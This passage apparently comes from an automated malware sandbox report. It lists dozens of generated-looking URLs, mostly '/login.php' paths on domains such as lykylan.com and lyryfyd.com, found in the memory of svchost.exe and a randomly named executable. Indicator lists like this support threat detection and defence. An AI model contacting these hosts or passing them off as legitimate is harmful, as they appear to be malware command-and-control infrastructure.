0000001C.00000002.1932747230.0000000000DB1000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.2053422068.0000000008D3B000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001F.00000002.1932849520.0000000000C53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyjad.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykylan.com/http://vofyjuk.com/H
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykylan.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykylud.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592136244.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykymij.com/login.php
Source: svchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1828997616.0000000008A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykynon.com/
Source: svchost.exe, 00000002.00000003.2101253018.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2617205537.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1859997516.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710580103.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613895496.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2088274615.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2101914674.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724217882.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2033340194.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1598016540.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801191951.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1598041021.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095869599.0000000002FAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykynyd.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyvor.com/login.php
Source: svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyvor.com/login.phpr
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104244256.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykywex.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykywid.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyfyn.com/login.php
Source: svchost.exe, 00000002.00000003.1937479340.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911552556.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929371959.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1918717004.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymygor.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1725365162.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymygyx.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2482360119.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2606550802.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2138962739.000000000089D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjix.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432764888.0000000008B0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433688306.0000000008B16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1471391644.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1657362701.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1657376102.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432912644.0000000008B12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433691652.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432910805.0000000008B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymylyr.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514765633.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyner.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymytuj.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576652644.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576507810.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyved.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyvin.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1598436167.000000000D628000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywad.com/login.php
Source: svchost.exe, 00000002.00000003.1806381048.000000000D673000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1809959193.0000000002F1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800870882.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1552121773.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559587168.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywun.com/login.php
Source: svchost.exe, 00000002.00000003.1389634570.0000000008AA0000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.000000000110F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.2076688408.00000000093E8000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.2053422068.0000000008D3B000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001F.00000002.1932849520.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001F.00000002.2108379782.0000000008996000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lyryfyd.com/
Source: svchost.exe, 00000002.00000003.1389634570.0000000008AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryfyd.com/http://vopybyt.com/http://pujyjav.com/http://lyvytuj.com/http://lyvytuj.com/0
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937479340.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911552556.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1610082181.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1830571345.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1861091241.0000000008B72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613723889.0000000008B28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1768332596.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881038659.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryfyd.com/login.php
Source: svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1487225312.0000000008B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryled.com/login.php
Source: svchost.exe, 00000002.00000003.1800870882.0000000008AA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547218137.0000000008B1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547224905.0000000008B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrylix.com/
Source: svchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1820476887.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1830571345.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800870882.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1825691340.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1821880893.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrylix.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrynad.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrynux.com/
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrynux.com/H
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576652644.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576507810.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrynux.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryson.com/login.php
Source: svchost.exe, 00000002.00000003.1684990918.0000000008BC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664583329.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433691652.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrysor.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2482360119.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1610082181.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2142459408.0000000002F1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613723889.0000000008B28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2138962739.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2483073459.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615554415.0000000002F1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrywoj.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryxij.com/
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595141664.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryxud.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533903269.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyger.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1725365162.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyjid.com/login.php
Source: svchost.exe, 00000002.00000003.1859997516.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysylun.com/
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysymor.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysytyn.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1471391644.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433247007.0000000008B0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664161481.0000000002FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyvan.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyvax.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514765633.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724324245.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysywon.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1569151955.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysywyd.com/
Source: svchost.exe, 00000002.00000003.1800870882.0000000008AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyxar.com/
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyxuj.com/login.php
Source: svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710718578.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1487225312.0000000008B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyxux.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514765633.0000000008B09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyfad.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2606365223.0000000000884000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2141970515.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvygyd.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvylyx.com/login.php
Source: svchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800870882.0000000008A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvymej.com/
Source: svchost.exe, 00000002.00000003.1820476887.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559578676.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1809959193.0000000002F1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1569151955.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1830571345.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559905278.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1825691340.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1821880893.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvymej.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvymun.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvysur.com/http://vojykom.com/http://lyvysur.com/http://purybav.com/http://vojykom.com/H
Source: svchost.exe, 00000002.00000003.1389634570.0000000008AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvytuj.com/http://vojyjof.com/http://vojyjof.com/
